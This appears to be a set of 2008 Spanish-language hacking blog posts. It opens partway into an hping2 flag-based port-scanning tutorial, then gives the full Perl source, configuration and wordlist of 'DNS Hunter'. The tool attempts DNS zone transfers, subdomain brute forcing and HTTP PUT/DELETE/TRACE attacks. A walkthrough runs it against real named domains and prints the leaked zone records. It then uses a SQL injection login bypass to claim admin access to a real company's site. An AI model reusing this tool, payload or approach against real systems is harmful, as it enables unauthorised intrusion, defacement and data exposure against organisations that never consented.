--tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
-d  --data       data size                    (default is 0)
-E  --file       data from file
-e  --sign       add 'signature'
-j  --dump       dump packets in hex
-J  --print      dump printable characters
-B  --safe       enable 'safe' protocol
-u  --end        tell you when --file reached EOF and prevent rewind
-T  --traceroute traceroute mode              (implies --bind and --ttl 1)
--tr-stop        Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt       Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send       Send the packet described with APD (see docs/APD.txt)

como podran leer el uso de la herramienta es hping ip_o_host y la(s) opciones a utilizar.

Primero que nada explicare que es un flag, aunque los que hayan leeido sobre protocolos no sera ninguna novedad....

Un flag es una especie de comando, que se incluye en paquetes, que especifica acciones, por ejemplo, preguntar si podemos conectar (sincronizar), contestar que esta abierto determinado puerto, comenzar conexion, terminar conexion e incluso enviar datos y especificar la importancia de dichos datos, cave recalcar que dichos flags o banderas.

En TCP todo esta manejado por paquetes, asi que les recomiendo que vean el siguiente video tutorial que encontre en youtube:

http://www.youtube.com/watch?v=muh9u_F5oeg

Algo Basico pero igual sirve para entender la teoria de como funciona esto....
ahora enumeremos los principales flags (banderas) TCP:

SYN: Le dice al servidor a conectar que intentamos conectar o sincronizar.
ACK: es una cofirmacion de que los datos anteriores llegaron correctamente.
FIN: Le dice al servidor que queremos cerrar una conexion.
Null: un flag de valor nulo (0) o sea que es un paquete al que se le ah eliminado todos los flags, este paquete es enviado con el fin de optener un RST ACK o un SYN ACK.
RST: Significa Reset, o sea que reinicie la conexion por que ubo algun error, que estan filtrados los flags o que esta cerrado el puerto.
PSH: Cuando deseamos enviar una cantidad de información grande dividida en paquetes, éstos se van
situando en un buffer de transmisión FIFO (First In First Out) hasta que el último de ellos está preparado.
Este último paquete tiene activado el flag push e indica que se debe vaciar el buffer y comenzar el envío
de paquetes.
URG: significa urgente y quiere decir que enviamos un paquete con datos urgentes, tambien se pueden usar punteros para enviar datos urgentes con normales.

Espero ando que no se me aya pasado nada, continuamos:

ICMP (Internet Control Message Protocol) es un protocolo bastante simple que está orientado a fines
informativos o de control de errores.

Mensaje ICMP:
0=echo reply
3=destination unreachable
4=source quench
5=redirect
8=echo
11=time exceeded
12=parameter problem
13=timestamp
14=timestamp reply
15=information request
16=information reply
Supongo que se entiende no?...

Continuamos:

Para hacer mas entendible el tema vamos a la practica:
Para comenzar utilizaremos a hping2 como un scanner de puertos basado en flags, esto es algo avanzado y laborioso pero optenemos exelentes resultados ....

En este ejemplo utilizare el hping2 el cual es la version mas resiente (o la mas resiente que encontre xD).

Quote

BT ~ # hping2 -c 1 -S -p 80 google.com
HPING google.com (eth0 64.233.187.99): S set, 40 headers + 0 data bytes
len=46 ip=64.233.187.99 ttl=241 id=30495 sport=80 flags=SA seq=0 win=8190 rtt=128.4 ms

Vamos por partes:
-c 1: cuenta los paquetes.
-S: especifica que utilizaremos paquetes con flags SYN.
-p 80: especifica el puerto en este caso 80 (HTTP).
Ahora la respuesta:
ip=64.233.187.99: es la io que resolvio hping2.
ttl=241: Time to Alive.
sport=80: el puerto.
flags=SA: Esto es lo que nos interesa, SA significa que envio un paquete con los flags SYN y ACK, lo cual quiere decir, que nuestro paquete llego correctamente y que el puerto esta abierto .
Ahora un ejemplo de puerto cerrado:

Quote

BT ~ # hping2 -c 1 -S -p 20 192.168.1.254
HPING 192.168.1.254 (eth0 192.168.1.254): S set, 40 headers + 0 data bytes
len=51 ip=192.168.1.254 ttl=255 DF id=55848 sport=20 flags=RA seq=0 win=0 rtt=0.6 ms

--- 192.168.1.254 hping statistic ---
1 packets tramitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.6/0.6/0.6 ms

Ahora como podremos darnos cuenta aqui cambio el flag:
flags=RA
En este caso resivimos RST y ACK o sea que el puerto esta cerrado...

Ahora vamos por un puerto filtrado:
En este caso es simple, por que no resiviremos respuesta jajajaja.

Ahora cabe especificar que no solo podemos utilizar el flag SYN para esto, lo cual es muy util, ya que algunas flags, estan filtradas por el firewall, router, o incluso una configuracion del iptables en un entorno linux, por lo cual estan otras opciones:

-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)

Tipo de Scanneos:
ACK: Este es utilizado para saber si el server esta detras de un firewall, o si el puerto(s), estan filtrados.
Si obtenemos un ACK el puerto esta abierto o cerrado, y si no resivimos respuesta el puerto esta filtrado (probablemente detras de un firewall).
SYN: este es utilizado para detectar si un puerto esta abierto o cerrado.
FIN: este sirve para detectar puertos abiertos entre otras cosas, si resivimos un RS ACK, esta cerrado el puerto, si no recivimos nada, es que el puerto esta filtrado o como dije arriba detras de un firewall, router, modem, etc, que estorban el envio del paquete.
otra clase de scanneos es el que no lleba ningun flag, tambien es bastante efectivo, y tambien el scanneo mediante todos los flags, que a mi pareser es el menos efectivo, ya que rara vez responden el paquete...

Scanneo de Puertos multiples:
la sintaxis es simple:

Quote

BT ~ # hping2 -l eth0 -S xxx.xxx.xxx.xxx -p ++80

es basicamente la sintaxis de los anteriores scanneres solo que al numero de puerto se le agregan los simbolos "++" antes del numero, ademas como podran observar aqui le especifique el adaptador de red a utilizar (es descartable esto).

Otra forma de scanneo multiple:

Quote

BT ~ # hping2 -V -8 '20-80' -S xxx.xxx.xxx.xx

Este tipo de scanneo es por medio de rangos de puertos, en esta forma utilize el -V (modo verboso), -8 (el modo de scanner, tambien es remplazable por --scan, y utilizo el flag SYN para scannear, que como ya dije arriba se puede cambiar por los otros tipos de scanneo (dependiendo de lo que queremos hacer).

Solo queda probar, asi incluso podemos saltar algunas protecciones de firewalls, routers, o configuraciones de seguridad.

DNS Hunter Fenix 1.0

2008-08-18T13:33:00.001-07:00

Pantalla de ayuda:

Código:

                                ..::DNS Hunter By Xianur0 Version Fenix (Privada)::..

[-]Uso: dns.pl [dominio] [opciones]
Opciones:
-t HTTP AttackToolKit
-u Buscar Actualizaciones
-w Ataque Whois
-d Ataque DNS
-a Ejecuta Todo lo Anterior

Logs de Ejemplo:
http://phreackersworld.phpnet.us/wikipedia.org.txt
http://phreackersworld.phpnet.us/google.com.txt

ya les dije que no es la gran cosa esta tool, as� que no hagan malos comentarios que yo nunca he dicho que es una mega tool xD...

Nota: el codigo XST como todos sabremos es obsoleto, pero lo puse como ejemplo xD...
Nota 2: El Installer.pl no es compatible con windows, así que tendrán que bajar las librerías manualmente:

Librerías:

http://www.net-dns.org/download/
http://search.cpan.org/CPAN/authors/id/G/GR/GRANTM/XML-Simple-2.18.tar.gz
http://search.cpan.org/CPAN/authors/id/L/LU/LUISMUNOZ/NetAddr-IP-4.007.tar.gz

installer.pl

Código:

#!/usr/bin/perl
use CPAN;
use LWP::UserAgent;
use HTTP::Request::Common;

CPAN::Shell->install("Net::DNS");
CPAN::Shell->install("NetAddr::IP");
CPAN::Shell->install("LWP::UserAgent");
CPAN::Shell->install("HTTP::Request::Common");
CPAN::Shell->install("XML::Simple");
CPAN::Shell->install("Getopt::Std");

print "[X] Instalado! :).... \n[X] Ejecuta: perl dns.pl\n";
system('perl dns.pl');

dns.pl

Código:

#!/usr/bin/perl

use Net::DNS;
use Net::DNS::RR;
use NetAddr::IP;
use LWP::UserAgent;
use Socket;
use HTTP::Request::Common;
use XML::Simple;
use Getopt::Std;

#DNS Hunter By Xianur0
#uxmal666@gmail.com
#Uso: dns.pl [Web] [Opción]

#CONFIGURACION:
#------------------------------------------
$ver = "0.2";
%whoisserver = (
    'com', 'whois.crsnic.net',
    'net', 'whois.crsnic.net',
    'edu', 'whois.crsnic.net',
    'org', 'whois.publicinterestregistry.net',
    'info', 'whois.rotld.ro');
$ua = LWP::UserAgent->new;
my $lib = XMLin("lib.xml");
#-------------------------------------------
print "                                ..::DNS Hunter By Xianur0 Version Fenix (Privada)::..\n\n";
my $host = $ARGV[0];
new NetAddr::IP($host) || die "Error: IP o Dominio Incorrecto!\n";

   my $opt_string = 'whdta';
   whois() if $opt{w};
   uso() if $opt{h};
   dns() if $opt{d};
   http() if $opt{t};
   todo() if $opt{a};

sub dns() {
print "\n[-]Inicio del Scanneo: ". localtime()."\n";
&soa;
&mx;
&txt;
&ns;
&hinfo;
&dnsrotativo;
&any;
&zonas;
print "Fin del Scanneo: ". localtime(). "\n";
}
sub todo() {
whois();
dns();
http();
}
sub uso {
die "[-]Uso: dns.pl [dominio] [opciones]\nOpciones:\n-t HTTP AttackToolKit\n-w Ataque Whois\n-d Ataque DNS\n-a Ejecuta Todo lo Anterior\n";
}
sub dnsrotativo {
print "[-]Buscando DNS Rotativos (Mediante PTR)...:\n";
my $consulta = new NetAddr::IP($host);
&consultar;
my $inicial = $ipaddr;
&consultar;
while($inicial ne $ipaddr) { &consultar; }
}

sub consultar {
my $consulta = new NetAddr::IP($host) || die "Error: IP o Dominio Incorrecto!\n";
my $resolver = Net::DNS::Resolver->new;
my $hosts = $consulta->num();
for (my $i=0; $i<$hosts; ++$i) { $ipaddr = $consulta->addr();
if ($ipaddr) {
my $consulta = $resolver->search("$ipaddr");
if ($consulta) {
foreach my $array ($consulta->answer) {
next unless $array->type eq "PTR";
print "IP: $ipaddr\n","Host: " ,$array->ptrdname, "\n\n"; }
} }}
}

sub soa {
print "[-]Registro SOA:\n";
my $resolver   = Net::DNS::Resolver->new;
my $consulta = $resolver->query($host, "SOA");
if ($consulta) {
 ($consulta->answer)[0]->print;
}
print "\n\n";
}

sub zonas {
if($sdns[0] eq "") { $sdns[0] = $ipaddr;}
foreach $dnsa (@sdns) {
print "[-]Intentando Ataque AXFR....: Usando: $dnsa\n";
my $consulta = Net::DNS::Resolver->new;
$consulta->nameservers($dnsa);
my @zonas = $consulta->axfr($host);
if(!@zonas) { print "No se Logro Obtener Zonas :(..."; &detectarcomodin; } else {
foreach $array (@zonas) {
 $array->print;
} print "\Vulnerado :D!\n\n";}
print "\n\n";
} }

sub ns {
my $consulta   = Net::DNS::Resolver->new;
my $consulta = $consulta->query($host, "NS");
if ($consulta) {
print "[-]Servidores DNS:\n";
 foreach $array (grep { $_->type eq 'NS' } $consulta->answer) {
print $array->nsdname ."\n";
@sdns = (@sdns, $array->nsdname);
 }
}
print "\n\n";
}

sub hinfo {
my $consulta   = Net::DNS::Resolver->new;
my $consulta = $consulta->query($host, "HINFO");
if ($consulta) {
print "\n[-]Registro HINFO:\n";
 foreach $array ($consulta->answer) {
 $array->print;
 }}
print "\n\n";
}

sub mx {
my $resolver   = Net::DNS::Resolver->new;
my $consulta = $resolver->query($host, "MX");
if ($consulta) {
print "\n[-]Servidores de Correo: \n";
 foreach $array ($consulta->answer) {
 $array->print;
}
print "\n";
}
}

sub txt {
my $resolver   = Net::DNS::Resolver->new;
my $consulta = $resolver->query($host, "TXT");
if ($consulta) {
print "\n[-]Registro TXT (Configuracion MX): \n";
 foreach $array ($consulta->answer) {
 $array->print;
}
print "\n\n";
}
}

sub any {
print "[-]Obteniendo informaci�n Extra:\n";
my $resolver   = Net::DNS::Resolver->new;
my $consulta = $resolver->query($host, "ANY");
if ($consulta) {
 foreach $array ($consulta->answer) {
 $array->print;
}}
print "\n\n";
}

sub detectarcomodin {
print "Detectando Comodin en Registros A...\n";
my $consulta = new NetAddr::IP("dnshunter.$host");
if($consulta) { print "\nServidor Protegido contra DNS Brutes Forces...."; &brute2; } else {print "No Se Detecto Comodin :).\n"; &brute;}
}
sub brute {
print "Probando DNS Brutes Forces:\n";
$db = 'db.txt';
my $sub;
open(SUBS, $db) || die "No existe la DB!";
while($sub = ){
chomp($sub);
$remoto = "$sub.$host";
my $consulta = new NetAddr::IP($remoto);
if($consulta) {print "$remoto existe!\n"; &robots;}
}
close(SUBS);
}
sub brute2 {
print "Iniciando Fase 2....\n";
$url = "detectarcomodinesenlosregistroshost.$host";
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
$estado = $res->code;

if ($estado != ""){
print "Servidor Protegido Contra Brutes Forces en el Header Host del HTTP :(...\n";
}
else {print "No se detecto Proteccion en el HTTP :)..\n"; &brute3; }
}

sub headers {
$req->header('Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
$req->header('Keep-Alive' => '300');
$req->header('Connection' => 'keep-alive');
$req->header('Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
}
sub brute3 {
$db = 'db.txt';
my $sub;
open(SUBS, $db) || die "No existe la DB!";
while($sub = ){
chomp($sub);
$remoto = "$sub.$host";
my $proto = getprotobyname('tcp');
my $ipaddr = inet_aton($remoto);
my $paddr = sockaddr_in(80, $ipaddr);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
$conected = connect(SOCKET, $paddr);
close SOCKET;
if ($conected) {
print "$remoto Existe!\n";
}
}
close(SUBS);
}
sub robots {
$req = HTTP::Request->new(GET => "http://$host/robots.txt");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
if($res->content_type eq 'text/plain') {
print "--------------------------------------------------------------------------------------\n".$res->content."\n--------------------------------------------------------------------------------------\n";
}
}
}
sub http() {
use IO::Socket;
print "\n[-]HTTP Attack ToolKit: \n\n";
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'1', );
if(!$sock) {print "No se Pudo Conectar a $host!\n"; } else {
print $sock "OPTIONS / HTTP/1.1\nHost: $host\n\n";
print "-----------------------Headers--------------------------\n";
while ($linea = <$sock>) {
if ($linea =~  "HTTP/1.") {
print "Estado De Respuesta: ".$linea;
}
if ($linea =~  /Server:/) {
print $linea;
for( @{$lib->{server}} ) {
if ($linea =~  "$_->{banner}") { print "$_->{nombre}\n"; }
}
}
for( @{$lib->{header}} ) {
if ($linea =~  "$_->{banner}") {
if($linea !~ "<") { my @header = split(": ", $linea); print "$_->{nombre}".$header[1];
}
}
}
}
close($sock);
print "-------------------------------------------------\n\n";
#PUT
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "PUT /hacked.htm HTTP/1.1\nHost: $host\nContent-Length: 38\n\r\n\rVulnerado por DNS Hunter 0.2
\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a PUT!!....\n      Estado de Respuesta: $_->{numero}\n\n";
}
}
close($sock);
#TRACE
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "TRACE / HTTP/1.1\nHost: $host\n\r\n\r";
while ($linea = <$sock>) {
if ($linea =~  "message/http") {
print "[-]Vulnerable a TRACE!.....:\nCodigo XST de Demostracion:.\n------------------------------------------\n\n------------------------------------------\n\n";
}
 }
close($sock);
#DELETE
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "DELETE /hacked.htm HTTP/1.1\nHost: $host\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a DELETE!!....\n      Estado de Respuesta: $_->{numero}\n\n";
}
}
close($sock);
}}

sub whois() {
my @hosts = split(/\./, $host);
$extencion = pop(@hosts);
$whoisserver = $whoisserver{$extencion};
if($whoisserver eq "") {print "Whois No Disponible para la Extencion: $extencion";} else {
my $sock = new IO::Socket::INET ( PeerAddr => $whoisserver, PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
print $sock "=".$host."\n";
print "\n[-]Whois ($whoisserver): \n-----------------------------------------------------\n\n";
while ($linea = <$sock>) {
if($linea =~ $host) {
print "Server: $linea";
}
if($linea =~ "Whois Server") {
my @dato = split(": ", $linea);
chop($dato[1]);
my $who = new IO::Socket::INET ( PeerAddr =>$dato[1], PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
if(!$who) { print "[-]Server Whois Down!\n"; } else {
print $who $host."\n";
print "\n[-]\n\n"; while($whos = <$who>)  { print $whos; }
print "\n\n[-]\n\n";
}} else {
for( @{$lib->{whois}} ) {
if ($linea =~  "$_->{etiqueta}") {
my @dato = split(": ", $linea);
print "$_->{imprimir}".$dato[1]; }
}
}}
print "\n-----------------------------------------------------\n\n";
}}

lib.xml



<db>
<server>
<banner>gws</banner>
<nombre>Google Server</nombre>
</server>
<server>
<banner>GFE</banner>
<nombre>Google Server</nombre>
</server>
<server>
<banner>Unix</banner>
<nombre>Servidor Unix/Linux</nombre>
</server>
<server>
<banner>IIS</banner>
<nombre>Windows Server</nombre>
</server>
<server>
<banner>ucfe</banner>
<nombre>Google Server</nombre>
</server>
<server>
<banner>Debian</banner>
<nombre>Debian Server (linux)</nombre>
</server>
<server>
<banner>lighttpd</banner>
<nombre>Unix/Linux Server (lighttpd)</nombre>
</server>
<server>
<banner>Sun</banner>
<nombre>Sun Server</nombre>
</server>

<header>
<banner>Date</banner>
<nombre>Fecha Interna: </nombre>
</header>
<header>
<banner>Vary</banner>
<nombre>Vary: </nombre>
</header>
<header>
<banner>Content-Encoding</banner>
<nombre>Codificacion de la Pagina: </nombre>
</header>
<header>
<banner>X-Cache</banner>
<nombre>Cache Server: </nombre>
</header>
<header>
<banner>X-Cache-Lookup</banner>
<nombre>Cache Server: </nombre>
</header>
<header>
<banner>Via</banner>
<nombre>Proxy Server: </nombre>
</header>
<header>
<banner>X-Powered-By</banner>
<nombre>Powered: </nombre>
</header>
<header>
<banner>Set-Cookie</banner>
<nombre>Cookie Inicial: </nombre>
</header>
<header>
<banner>P3P</banner>
<nombre>Licencia P3P: </nombre>
</header>
<header>
<banner>Location</banner>
<nombre>Redireccion: </nombre>
</header>
<estado>
<numero>200</numero>
</estado>
<estado>
<numero>201</numero>
</estado>
<estado>
<numero>202</numero>
</estado>
<estado>
<numero>401</numero>
</estado>
<estado>
<numero>403</numero>
</estado>
<whois>
<etiqueta>Server Name</etiqueta>
<imprimir>Nombre del Servidor: </imprimir>
</whois>
<whois>
<etiqueta>Registrar</etiqueta>
<imprimir>Registrado Con: </imprimir>
</whois>
<whois>
<etiqueta>Referral UR</etiqueta>
<imprimir>Registrado En: </imprimir>
</whois>
<whois>
<etiqueta>IP Address</etiqueta>
<imprimir>IP: </imprimir>
</whois>


<whois>
<etiqueta>Status</etiqueta>
<imprimir>Estado: </imprimir>
</whois>

<whois>
<etiqueta>Updated Date</etiqueta>
<imprimir>Ultima Actualizacion: </imprimir>
</whois>

<whois>
<etiqueta>Creation Date</etiqueta>
<imprimir>Dominio Registrado El: </imprimir>
</whois>

<whois>
<etiqueta>Expiration Date</etiqueta>
<imprimir>El Dominio Expira el: </imprimir>
</whois>
<whois>
<etiqueta>Name Server</etiqueta>
<imprimir>Servidor DNS: </imprimir>
</whois>
<whois>
<etiqueta>Registrant</etiqueta>
<imprimir>Registrante: </imprimir>
</whois>
<whois>
<etiqueta>Domain Name</etiqueta>
<imprimir>Domain Name: </imprimir>
</whois>
<whois>
<etiqueta>Administrative Contact, Technical Contact</etiqueta>
<imprimir>Datos Tecnicos: </imprimir>
</whois>
</db>

db.txt


www
www1
www2
www3
ftp
ns
mail
3com
aix
apache
back
bind
boreder
bsd
business
chains
cisco
content
corporate
cpv
dns
domino
dominoserver
download
e-mail
e-safe
email
esafe
external
extranet
firebox
firewall
front
fw
fw0
fwe
fw-1
firew
gate
gatekeeper
gateway
gauntlet
group
help
hop
hp
hpjet
hpux
http
https
hub
ibm
ids
info
inside
internal
internet
intranet
ipfw
irix
jet
list
lotus
lotusdomino
lotusnotes
lotusserver
mailfeed
mailgate
mailgateway
mailgroup
mailhost
maillist
mailpop
mailrelay
mimesweeper
ms
msproxy
mx
nameserver
news
newsdesk
newsfeed
newsgroup
newsroom
newsserver
nntp
notes
noteserver
notesserver
nt
outside
pix
pop
pop3
pophost
popmail
popserver
print
printer
private
proxy
proxyserver
public
qpop
raptor
read
redcreek
redhat
route
router
scanner
screen
screening
secure
seek
smail
smap
smtp
smtpgateway
smtpgw
solaris
sonic
spool
squid
sun
sunos
suse
switch
transfer
trend
trendmicro
vlan
vpn
wall
web
webmail
webserver
webswitch
win2000
win2k

instalación: Correr installer.pl darle yes a todo lo que pregunte y listo xD...

Testeando con DNS Hunter

2008-08-18T13:31:00.001-07:00

Nota Previa: este texto es de la versi�n reducida del DNS Hunter (es decir no la fenix).

DNS Hunter es una tool que hice para el duelo con tiger, pero me pidieron que hiciera un manual de como testear con ella, bueno vamos a lo simple:

Solo explicare algunas partes de la tool que no se vieron en los manuales de arriba:

Buscador de DNS Rotativos:
Detecta cuando un servidor usa enmascaramiento por DNS y cuando rotan los DNS (cambia de servidor DNS cada cierto tiempo).

Visualizador de Zonas:
Esta Funci�n es muy �til para detectar un servidor DNS mal configurado ademas de detectar todos los subdominios de un dominio dado, y aunque a muchos les sorprenda muchos de los servidores mas famosos son vulnerables (incluyendo a wikipedia jejejeje).

Bueno ya explique las partes "dudosas", ahora explicare como podr�amos usar esto:

Utilizare un objetivo general que encontre en google para este ligero texto xD:

telefe.com.ar

Código:

UxMal Desktop # dns.pl telefe.com.ar
                                        ..::DNS Hunter By UxMal::..

[-]Registro SOA:
telefe.com.ar.  43200   IN      SOA     telefe.com.ar. webmaster.telefe.com.ar. (
                                        2007081401      ; Serial
                                        3600    ; Refresh
                                        180     ; Retry
                                        1296000 ; Expire
                                        900 )   ; Minimum TTL


[-]Servidores DNS:
tlfdns02.telefe.com.ar
tlfdns01.telefe.com.ar


[-]Buscando DNS Rotativos...:
[-]Obteniendo Informacion Extra:
telefe.com.ar.  43199   IN      SOA     telefe.com.ar. webmaster.telefe.com.ar. (
                                        2007081401      ; Serial
                                        3600    ; Refresh
                                        180     ; Retry
                                        1296000 ; Expire
                                        900 )   ; Minimum TTL


[-]Intentando Obtener Zonas....: Usando: tlfdns01.telefe.com.ar
telefe.com.ar.  43200   IN      SOA     telefe.com.ar. webmaster.telefe.com.ar. (
                                        2007081401      ; Serial
                                        3600    ; Refresh
                                        180     ; Retry
                                        1296000 ; Expire
                                        900 )   ; Minimum TTL
telefe.com.ar.  43200   IN      MX      5 tlfdns03.telefe.com.ar.
telefe.com.ar.  43200   IN      MX      10 tlfdns01.telefe.com.ar.
telefe.com.ar.  43200   IN      MX      15 tlfdns02.telefe.com.ar.
telefe.com.ar.  43200   IN      NS      tlfdns01.telefe.com.ar.
telefe.com.ar.  43200   IN      NS      tlfdns02.telefe.com.ar.
telefe.com.ar.  43200   IN      TXT     "v=spf1 ip4:192.168.171.146 ip4:192.168.172.153 ip4:192.168.171.1 ip4:192.168.172.1 mx -all"
telefe.com.ar.  43200   IN      A       66.231.227.176
bahiablanca.telefe.com.ar.      43200   IN      CNAME   c9bahiablanca.dyndns.org.
c11salta.telefe.com.ar. 43200   IN      CNAME   c11salta.dyndns.org.
c13santafe.telefe.com.ar.       43200   IN      CNAME   c13santafe.dyndns.org.
c5rosario.telefe.com.ar.        43200   IN      CNAME   c5rosario.dyndns.org.
c7neuquen.telefe.com.ar.        43200   IN      CNAME   c7neuquen.dyndns.org.
c8cordoba.telefe.com.ar.        43200   IN      CNAME   c8cordoba.dyndns.org.
c8mardelplata.telefe.com.ar.    43200   IN      CNAME   c8mardelplata.dyndns.org.
c8tucuman.telefe.com.ar.        43200   IN      CNAME   c8tucuman.dyndns.org.
c9bahiablanca.telefe.com.ar.    43200   IN      CNAME   c9bahiablanca.dyndns.org.
cordoba.telefe.com.ar.  43200   IN      CNAME   c8cordoba.dyndns.org.
daresdar.telefe.com.ar. 43200   IN      A       66.231.227.173
www.daresdar.telefe.com.ar.     43200   IN      A       66.231.227.173
dns1.telefe.com.ar.     43200   IN      CNAME   tlfdns01.telefe.com.ar.
dns2.telefe.com.ar.     43200   IN      CNAME   tlfdns02.telefe.com.ar.
dns3.telefe.com.ar.     43200   IN      CNAME   tlfdns03.telefe.com.ar.
ftp.telefe.com.ar.      43200   IN      A       200.51.91.146
gh07.telefe.com.ar.     43200   IN      A       66.231.227.173
gh07famosos.telefe.com.ar.      43200   IN      A       66.231.227.173
gh2007.telefe.com.ar.   43200   IN      A       66.231.227.173
gh5.telefe.com.ar.      43200   IN      A       66.231.227.173
www.gh5.telefe.com.ar.  43200   IN      A       66.231.227.173
hq.telefe.com.ar.       43200   IN      CNAME   hq1.telefe.com.ar.
hq1.telefe.com.ar.      43200   IN      A       200.51.44.188
hq2.telefe.com.ar.      43200   IN      A       200.51.91.155
mail1.telefe.com.ar.    43200   IN      CNAME   tlfdns01.telefe.com.ar.
mail2.telefe.com.ar.    43200   IN      CNAME   tlfdns02.telefe.com.ar.
mail3.telefe.com.ar.    43200   IN      CNAME   tlfdns03.telefe.com.ar.
mail4.telefe.com.ar.    43200   IN      CNAME   tlfdns04.telefe.com.ar.
mardelplata.telefe.com.ar.      43200   IN      CNAME   c8mardelplata.dyndns.org.
mundoshow.telefe.com.ar.        43200   IN      A       206.221.200.244
neuquen.telefe.com.ar.  43200   IN      CNAME   c7neuquen.dyndns.org.
noticias.telefe.com.ar. 43200   IN      A       66.231.227.176
noticias_cms.telefe.com.ar.     43200   IN      A       66.231.227.176
proveedores.telefe.com.ar.      43200   IN      A       200.51.91.149
www.proveedores.telefe.com.ar.  43200   IN      A       200.51.91.149
rosario.telefe.com.ar.  43200   IN      CNAME   c5rosario.dyndns.org.
salta.telefe.com.ar.    43200   IN      CNAME   c11salta.dyndns.org.
santafe.telefe.com.ar.  43200   IN      CNAME   c13santafe.dyndns.org.
telefe1.telefe.com.ar.  43200   IN      A       200.51.91.152
telefe2.telefe.com.ar.  43200   IN      A       200.16.211.181
telefe6.telefe.com.ar.  43200   IN      A       200.51.91.153
teleinde1.telefe.com.ar.        43200   IN      A       200.51.44.187
tlf-cap-01.telefe.com.ar.       43200   IN      A       200.51.91.149
tlfdns01.telefe.com.ar. 43200   IN      A       200.51.91.146
tlfdns02.telefe.com.ar. 43200   IN      A       200.51.44.189
tlfdns03.telefe.com.ar. 43200   IN      A       200.51.91.153
tlfdns04.telefe.com.ar. 43200   IN      A       200.51.91.150
tucuman.telefe.com.ar.  43200   IN      CNAME   c8tucuman.dyndns.org.
webmail.telefe.com.ar.  43200   IN      A       200.51.91.152
www.telefe.com.ar.      43200   IN      A       66.231.227.176

denotamos que es vulnerable a intercambio de zonas, bueno este seria un uso simple:

http://noticias_cms.telefe.com.ar/home/index.php

como notaran es un login, si probamos SQL Inyection:
User: ' or '1'='1
Password: ' or '1'='1

Disculpe las molestias

Admin Admin

en estos momentos estamos

trabajando para Ud.

como podr�n notar entramos como admin al sistema xD.

Ahora checamos a google:

Código:

UxMal Desktop # dns.pl google.com
                                        ..::DNS Hunter By UxMal::..

[-]Registro SOA:
google.com.     86400   IN      SOA     ns1.google.com. dns-admin.google.com. (
                                        2008030601      ; Serial
                                        7200    ; Refresh
                                        1800    ; Retry
                                        1209600 ; Expire
                                        300 )   ; Minimum TTL


[-]Servidores DNS:
ns2.google.com
ns3.google.com
ns4.google.com
ns1.google.com


[-]Buscando DNS Rotativos...:
IP: 64.233.187.99
Host: jc-in-f99.google.com

IP: 64.233.167.99
Host: py-in-f99.google.com

IP: 72.14.207.99
Host: eh-in-f99.google.com

[-]Obteniendo Informacion Extra:
google.com.     86399   IN      SOA     ns1.google.com. dns-admin.google.com. (
                                        2008030601      ; Serial
                                        7200    ; Refresh
                                        1800    ; Retry
                                        1209600 ; Expire
                                        300 )   ; Minimum TTL


[-]Intentando Obtener Zonas....: Usando: ns1.google.com
No se Logro Obtener Zonas :(...Provando DNS Brutes Forces:
www.google.com existe!
www2.google.com existe!
www3.google.com existe!
ns1.google.com existe!
ns2.google.com existe!
ns3.google.com existe!
ns4.google.com existe!
ns.google.com existe!
mail.google.com existe!
download.google.com existe!
email.google.com existe!
group.google.com existe!
news.google.com existe!
newsfeed.google.com existe!
print.google.com existe!
proxy.google.com existe!
smtp.google.com existe!
earth.google.com existe!
toolbar.google.com existe!
desktop.google.com existe!
pack.google.com existe!
groups.google.com existe!
directory.google.com existe!
picasa.google.com existe!
book.google.com existe!
books.google.com existe!
adwords.google.com existe!
ads.google.com existe!
images.google.com existe!
checkout.google.com existe!
picasaweb.google.com existe!
scholar.google.com existe!
webaccelerator.google.com existe!
code.google.com existe!
pages.google.com existe!
base.google.com existe!
docs.google.com existe!
doc.google.com existe!
catalog.google.com existe!
catalogs.google.com existe!
labs.google.com existe!
uploads.google.com existe!
adwords.google.com existe!
answers.google.com existe!
bizsolutions.google.com existe!
maps.google.com existe!
map.google.com existe!
directory.google.com existe!
gears.google.com existe!
services.google.com existe!
video.google.com existe!
research.google.com existe!
transfer.google.com existe!
vpn.google.com existe!
web.google.com existe!

Como podran notar tiene usa un sistema de enmascaramiento por DNS, es decir el DNS rota cada cierto tiempo, eso es util cuando un deface, es decir cambia la web y nadie ve el deface, o tambien para evitar scanners, etc. Ahora que tenemos los DNS's, podriamos realizar un scanneo mas extensivo. aparte de ello, al no ser vulnerable a intercambio de zonas, corrio el DNS Brutes Forces, que como podran notar, saco informacion interesante jejeje...

Otro uso:

Código:

UxMal Desktop # dns.pl atenea-linux.com
                                        ..::DNS Hunter By UxMal::..

[-]Registro SOA:
atenea-linux.com.       3600    IN      SOA     ns1.awardspace.com. hostmaster.awardspace.com. (
